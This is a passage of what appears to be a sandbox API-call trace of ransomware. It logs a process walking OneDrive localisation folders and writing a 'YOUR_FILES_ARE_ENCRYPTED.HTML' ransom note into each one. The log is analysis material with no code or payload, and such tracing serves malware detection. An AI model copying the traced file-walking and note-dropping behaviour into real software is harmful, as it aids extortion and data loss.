returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kn" [0112.983] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kn", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kn\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kn\\*" [0112.983] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kn\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x507bcfb7, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x507bcfb7, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x509f95ae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0112.984] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x507bcfb7, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x507bcfb7, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x509f95ae, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="..", cAlternateFileName="")) returned 1 [0112.984] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x509f95ae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x509f95ae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x50a920f2, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x172c0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.984] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.984] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kn\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.984] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.984] lstrlenW (lpString=".mui") returned 4 [0112.984] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.984] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x509f95ae, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x509f95ae, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x50a920f2, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x172c0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.984] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0112.984] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kn\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.984] GetProcessHeap () returned 0x600000 [0112.984] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0112.984] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kn\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\kn\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0112.985] WriteFile (in: hFile=0x324, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.986] CloseHandle (hObject=0x324) returned 1 [0112.986] GetProcessHeap () returned 0x600000 [0112.986] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0112.986] GetProcessHeap () returned 0x600000 [0112.986] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.987] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50b9ce08, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x50b9ce08, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x50b9ce08, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ko", cAlternateFileName="")) returned 1 [0112.987] StrStrIW (lpFirst="ko", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.987] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ko") returned 78 [0112.987] GetProcessHeap () returned 0x600000 [0112.987] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.988] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ko" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ko") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ko" [0112.988] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ko", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ko\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ko\\*" [0112.988] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ko\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50b9ce08, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x50b9ce08, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x50e97fc4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0112.988] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50b9ce08, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x50b9ce08, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x50e97fc4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="..", cAlternateFileName="")) returned 1 [0112.988] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50e97fc4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x50e97fc4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x50f3092d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0xf2c0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.988] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.988] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ko\\FileSync.LocalizedResources.dll.mui") returned 114 [0112.988] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.988] lstrlenW (lpString=".mui") returned 4 [0112.988] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.988] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50e97fc4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x50e97fc4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x50f3092d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0xf2c0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.988] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0112.988] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ko\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0112.988] GetProcessHeap () returned 0x600000 [0112.989] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0112.989] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ko\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\ko\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0112.989] WriteFile (in: hFile=0x324, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.990] CloseHandle (hObject=0x324) returned 1 [0112.990] GetProcessHeap () returned 0x600000 [0112.990] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0112.990] GetProcessHeap () returned 0x600000 [0112.990] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.990] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50f3092d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x50f3092d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x50f3092d, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="kok", cAlternateFileName="")) returned 1 [0112.990] StrStrIW (lpFirst="kok", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.990] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kok") returned 79 [0112.990] GetProcessHeap () returned 0x600000 [0112.990] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.990] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kok" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kok") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kok" [0112.990] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kok", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kok\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kok\\*" [0112.990] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kok\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50f3092d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x50f3092d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x510d3ed4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0112.991] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50f3092d, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x50f3092d, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x510d3ed4, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="..", cAlternateFileName="")) returned 1 [0112.991] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x510d3ed4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x510d3ed4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5116c84b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.991] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.991] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kok\\FileSync.LocalizedResources.dll.mui") returned 115 [0112.991] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.991] lstrlenW (lpString=".mui") returned 4 [0112.991] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.991] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x510d3ed4, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x510d3ed4, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5116c84b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x156c0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.991] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0112.991] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kok\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0112.991] GetProcessHeap () returned 0x600000 [0112.991] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0112.991] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\kok\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\kok\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0112.992] WriteFile (in: hFile=0x324, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.992] CloseHandle (hObject=0x324) returned 1 [0112.993] GetProcessHeap () returned 0x600000 [0112.993] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0112.993] GetProcessHeap () returned 0x600000 [0112.993] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.993] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5116c84b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5116c84b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5116c84b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ku-arab", cAlternateFileName="")) returned 1 [0112.993] StrStrIW (lpFirst="ku-arab", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.994] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ku-arab") returned 83 [0112.994] GetProcessHeap () returned 0x600000 [0112.994] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.995] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ku-arab" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ku-arab") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ku-arab" [0112.995] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ku-arab", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ku-arab\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ku-arab\\*" [0112.995] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ku-arab\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5116c84b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5116c84b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x513cef43, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName=".", cAlternateFileName="")) returned 0x626978 [0112.995] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5116c84b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5116c84b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x513cef43, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="..", cAlternateFileName="")) returned 1 [0112.995] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x513cef43, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x513cef43, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x51467b17, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15cc0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0112.995] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.995] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ku-arab\\FileSync.LocalizedResources.dll.mui") returned 119 [0112.995] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.995] lstrlenW (lpString=".mui") returned 4 [0112.995] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0112.995] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x513cef43, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x513cef43, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x51467b17, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x15cc0, dwReserved0=0x19e010, dwReserved1=0x2eaf1d0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0112.995] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0112.995] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ku-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0112.995] GetProcessHeap () returned 0x600000 [0112.995] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315d190 [0112.996] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ku-arab\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_3\\ku-arab\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0112.996] WriteFile (in: hFile=0x324, lpBuffer=0x315d190*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x315d190*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0112.997] CloseHandle (hObject=0x324) returned 1 [0112.997] GetProcessHeap () returned 0x600000 [0112.997] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315d190 | out: hHeap=0x600000) returned 1 [0112.997] GetProcessHeap () returned 0x600000 [0112.997] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.998] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51467b17, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x51467b17, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x51467b17, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ky", cAlternateFileName="")) returned 1 [0112.998] StrStrIW (lpFirst="ky", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0112.998] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ky") returned 78 [0112.998] GetProcessHeap () returned 0x600000 [0112.999] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0112.999] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ky" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_3\\ky") 